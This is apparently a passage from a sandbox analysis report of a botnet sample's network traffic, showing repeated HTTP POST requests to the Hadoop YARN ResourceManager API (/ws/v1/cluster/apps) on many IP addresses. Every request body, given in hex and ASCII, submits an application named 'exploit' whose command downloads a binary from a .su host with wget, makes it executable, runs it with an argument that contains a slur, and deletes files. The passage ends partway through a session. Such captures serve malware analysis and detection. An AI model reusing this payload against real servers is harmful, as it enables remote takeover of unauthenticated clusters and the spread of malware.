                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:10.679435015 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:12.659198999 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:16.722628117 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:24.657659054 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 78.220.79.118:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                2192.168.2.234547852.160.110.1268088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:17.818010092 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 52.160.110.126:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                3192.168.2.2338258138.85.232.548088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:23.821276903 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 138.85.232.54:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                4192.168.2.234516282.207.23.1528088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:26.822380066 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 82.207.23.152:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                5192.168.2.2339082100.179.115.1478088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:29.823653936 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 100.179.115.147:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                6192.168.2.2352626103.108.227.1848088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:32.824621916 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 103.108.227.184:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                7192.168.2.2346346244.58.211.2048088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:35.825790882 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 244.58.211.204:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                                                                                                Sep 12, 2024 00:37:36.036108017 CEST361OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 244.58.211.204:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                8192.168.2.235064099.17.152.2348088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:38.827234030 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 99.17.152.234:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                9192.168.2.2348256199.119.126.2288088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:41.828711033 CEST362OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 199.119.126.228:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                10192.168.2.2358376123.191.93.718088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:44.829803944 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 123.191.93.71:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                11192.168.2.2338034254.41.12.188088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:47.831758976 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 254.41.12.18:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                12192.168.2.2356610213.49.53.568088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:50.834150076 CEST359OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 213.49.53.56:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
                                                                                                Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d
                                                                                                Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                13192.168.2.234265891.185.226.478088
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Sep 12, 2024 00:37:53.836040020 CEST360OUTPOST /ws/v1/cluster/apps HTTP/1.1
                                                                                                Host: 91.185.226.47:8088
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 232
